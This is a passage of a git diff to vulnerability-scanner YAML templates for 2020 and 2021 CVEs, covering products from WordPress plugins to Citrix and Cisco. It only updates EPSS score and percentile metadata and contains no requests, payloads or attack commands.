@@ -19,7 +19,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00517 - epss-percentile: 0.74116 + epss-percentile: 0.74144 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 54228ad90b..e51dc5fd9c 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-7136 cwe-id: CWE-288 epss-score: 0.21561 - epss-percentile: 0.95894 + epss-percentile: 0.95896 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index aef9e4a45f..dba4bfda0a 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00051 - epss-percentile: 0.18032 + epss-percentile: 0.18022 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 476627e501..51e80bf00d 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-7796 cwe-id: CWE-918 epss-score: 0.72496 - epss-percentile: 0.97731 + epss-percentile: 0.97733 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index 25fff98b09..cc363604d5 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-7943 cwe-id: CWE-276,NVD-CWE-noinfo epss-score: 0.08018 - epss-percentile: 0.93584 + epss-percentile: 0.93589 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 99f2e99f9b..b1a8a97b45 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7961 cwe-id: CWE-502 - epss-score: 0.97414 - epss-percentile: 0.99905 + epss-score: 0.97384 + epss-percentile: 0.99887 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 842e2c6e14..847b626699 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 - epss-percentile: 0.87074 + epss-percentile: 0.87077 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index ff49ddae66..34945d0b5b 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58757 + epss-percentile: 0.58788 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 087f75e9d2..c4c5954e7c 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-8209 cwe-id: CWE-22 epss-score: 0.97075 - epss-percentile: 0.99688 + epss-percentile: 0.99689 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 9f357540e6..b603ade05d 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-8497 cwe-id: CWE-306 epss-score: 0.002 - epss-percentile: 0.57647 + epss-percentile: 0.57678 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index f86ea5c86f..910626d7e2 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-8512 cwe-id: CWE-79 epss-score: 0.01026 - epss-percentile: 0.82181 + epss-percentile: 0.8219 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 415704741f..66815b6c8c 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97142 - epss-percentile: 0.99722 + epss-percentile: 0.99723 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 334743e23a..e2b71e8e3d 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-8615 cwe-id: CWE-352 epss-score: 0.00658 - epss-percentile: 0.77243 + epss-percentile: 0.77264 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index d855c9e076..e6ff276ec2 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-8641 cwe-id: CWE-22 epss-score: 0.00659 - epss-percentile: 0.77267 + epss-percentile: 0.77288 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 5d8e40b2e6..de83966cd1 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8654 cwe-id: CWE-78 epss-score: 0.05628 - epss-percentile: 0.92444 + epss-percentile: 0.9245 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index 7a75d7f685..2a9da5a9e7 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8771 cwe-id: CWE-287 epss-score: 0.06142 - epss-percentile: 0.92737 + epss-percentile: 0.92742 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index 0b86783fc8..d718c89eca 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8772 cwe-id: CWE-862 epss-score: 0.96674 - epss-percentile: 0.99514 + epss-percentile: 0.99516 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 265d41b7d6..0bc2ad17ec 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-8813 cwe-id: CWE-78 epss-score: 0.94641 - epss-percentile: 0.99006 + epss-percentile: 0.99007 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index cbd845b883..3f6b8baedf 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8982 cwe-id: CWE-22 epss-score: 0.81478 - epss-percentile: 0.97998 + epss-percentile: 0.97999 cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index 618ecb1a28..0f45ec5a20 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-9036 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44579 + epss-percentile: 0.44601 cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index 2db7376720..77ad19ff8e 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.04173 - epss-percentile: 0.91216 + epss-percentile: 0.9122 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index 11110e53fa..67546dc85e 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-9047 cwe-id: CWE-347 epss-score: 0.01182 - epss-percentile: 0.83511 + epss-percentile: 0.83521 cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index bb4ba1dccb..7157b2e4a5 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-9054 cwe-id: CWE-78 epss-score: 0.97074 - epss-percentile: 0.99687 + epss-percentile: 0.99688 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 765059d662..33a3b8f5d8 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58281 + epss-percentile: 0.5831 cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 55ff999637..b7dd81ca1d 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-9402 cwe-id: CWE-89 epss-score: 0.38805 - epss-percentile: 0.96812 + epss-percentile: 0.96814 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 791c0f7e57..678a8516b4 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-9425 cwe-id: CWE-670 epss-score: 0.01611 - epss-percentile: 0.86041 + epss-percentile: 0.86046 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 1c872e414d..cb6e1dfbcf 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-9483 cwe-id: CWE-89 epss-score: 0.06298 - epss-percentile: 0.92829 + epss-percentile: 0.92835 cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index fc292478fc..6350ef7ec3 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9757 cwe-id: CWE-74 - epss-score: 0.96999 - epss-percentile: 0.9965 + epss-score: 0.97031 + epss-percentile: 0.99664 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index 8b216fd92b..b7bd727f22 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1497 cwe-id: CWE-78 - epss-score: 0.97463 - epss-percentile: 0.99952 + epss-score: 0.97507 + epss-percentile: 0.99978 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index a95624beaa..835e3fd3c8 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1498 cwe-id: CWE-78 - epss-score: 0.97463 - epss-percentile: 0.99952 + epss-score: 0.97507 + epss-percentile: 0.99978 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 22f5ba501d..87cd73e523 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-1499 cwe-id: CWE-306 epss-score: 0.96621 - epss-percentile: 0.99499 + epss-percentile: 0.995 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index b366a3d7a8..93727f3a4e 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20031 cwe-id: CWE-601 epss-score: 0.01202 - epss-percentile: 0.83671 + epss-percentile: 0.83681 cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index 348676db05..fc8e6b108e 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20038 cwe-id: CWE-787,CWE-121 epss-score: 0.95763 - epss-percentile: 0.99237 + epss-percentile: 0.99238 cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 6009b12846..5b15c22af1 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -18,7 +18,7 @@ info: cvss-score: 8.8 cve-id: CVE-2021-20091 epss-score: 0.00928 - epss-percentile: 0.8125 + epss-percentile: 0.81262 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 3f91a7b156..847fe8491a 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20092 cwe-id: CWE-287 epss-score: 0.01372 - epss-percentile: 0.8484 + epss-percentile: 0.84847 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 18c8e8c957..8054e985c0 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-20114 cwe-id: CWE-425 epss-score: 0.0178 - epss-percentile: 0.86667 + epss-percentile: 0.86671 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index e973a95b77..d1dbda7d98 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-20123 cwe-id: CWE-22 epss-score: 0.03817 - epss-percentile: 0.90857 + epss-percentile: 0.90863 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index e4bc3713a0..4c46eaffa4 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-20124 cwe-id: CWE-22 epss-score: 0.0152 - epss-percentile: 0.85592 + epss-percentile: 0.85598 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 3644bb803d..02f313f2ae 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-20150 cwe-id: CWE-306 epss-score: 0.14411 - epss-percentile: 0.95116 + epss-percentile: 0.95119 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index b6c38298f7..b06d67bb6c 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 - epss-percentile: 0.8373 + epss-percentile: 0.83739 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index d1ebbe2977..828cb48526 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-20167 cwe-id: CWE-77 epss-score: 0.95282 - epss-percentile: 0.99119 + epss-percentile: 0.9912 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index e42c1aa098..ee02e95ee0 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-20323 cwe-id: CWE-79 epss-score: 0.00208 - epss-percentile: 0.58577 + epss-percentile: 0.58606 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index a32d5370c3..81b7cae6af 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-20792 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57706 + epss-percentile: 0.57736 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 8f688bfa6e..3c1f41948f 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21087 cwe-id: CWE-79 epss-score: 0.00293 - epss-percentile: 0.65766 + epss-percentile: 0.65801 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 9acc553ebd..6ad470813e 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21234 cwe-id: CWE-22 epss-score: 0.96873 - epss-percentile: 0.99597 + epss-percentile: 0.996 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index c740adba82..26928bbc13 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21311 cwe-id: CWE-918 epss-score: 0.01052 - epss-percentile: 0.82417 + epss-percentile: 0.82428 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 74e6617b57..85ba08ff1a 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.8 cve-id: CVE-2021-21315 cwe-id: CWE-78 - epss-score: 0.96899 - epss-percentile: 0.99614 + epss-score: 0.96847 + epss-percentile: 0.99588 cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 6d1a30d102..d07c18917b 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 epss-score: 0.37552 - epss-percentile: 0.96765 + epss-percentile: 0.96766 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 8c6cf984a1..61e63dfcc2 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21389 cwe-id: CWE-863 epss-score: 0.76628 - epss-percentile: 0.97849 + epss-percentile: 0.97851 cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index dd16f6199a..f3bce8851f 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-21402 cwe-id: CWE-22 epss-score: 0.2158 - epss-percentile: 0.95895 + epss-percentile: 0.95898 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 3cf815a3b3..82235a4e3b 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-21479 cwe-id: CWE-74 epss-score: 0.0027 - epss-percentile: 0.6424 + epss-percentile: 0.64274 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 075d7e2120..f74046564e 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-21745 cwe-id: CWE-352 epss-score: 0.39266 - epss-percentile: 0.96838 + epss-percentile: 0.9684 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 69f9e78770..cd97dd5000 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-21799 cwe-id: CWE-79 epss-score: 0.83742 - epss-percentile: 0.98109 + epss-percentile: 0.98111 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 6bbf600f2c..3053b497f5 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-21800 cwe-id: CWE-79 epss-score: 0.83742 - epss-percentile: 0.98109 + epss-percentile: 0.98111 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 72a42feb2b..65f5426bf1 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-21801 cwe-id: CWE-79 epss-score: 0.83742 - epss-percentile: 0.98109 + epss-percentile: 0.98111 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 133f26ceb5..35936bdde4 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-21802 cwe-id: CWE-79 epss-score: 0.83742 - epss-percentile: 0.98109 + epss-percentile: 0.98111 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 3680f3a423..c4c2c24e89 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-21803 cwe-id: CWE-79 epss-score: 0.83742 - epss-percentile: 0.98109 + epss-percentile: 0.98111 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index 4594f71254..a713f3867b 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -16,7 +16,7 @@ info: 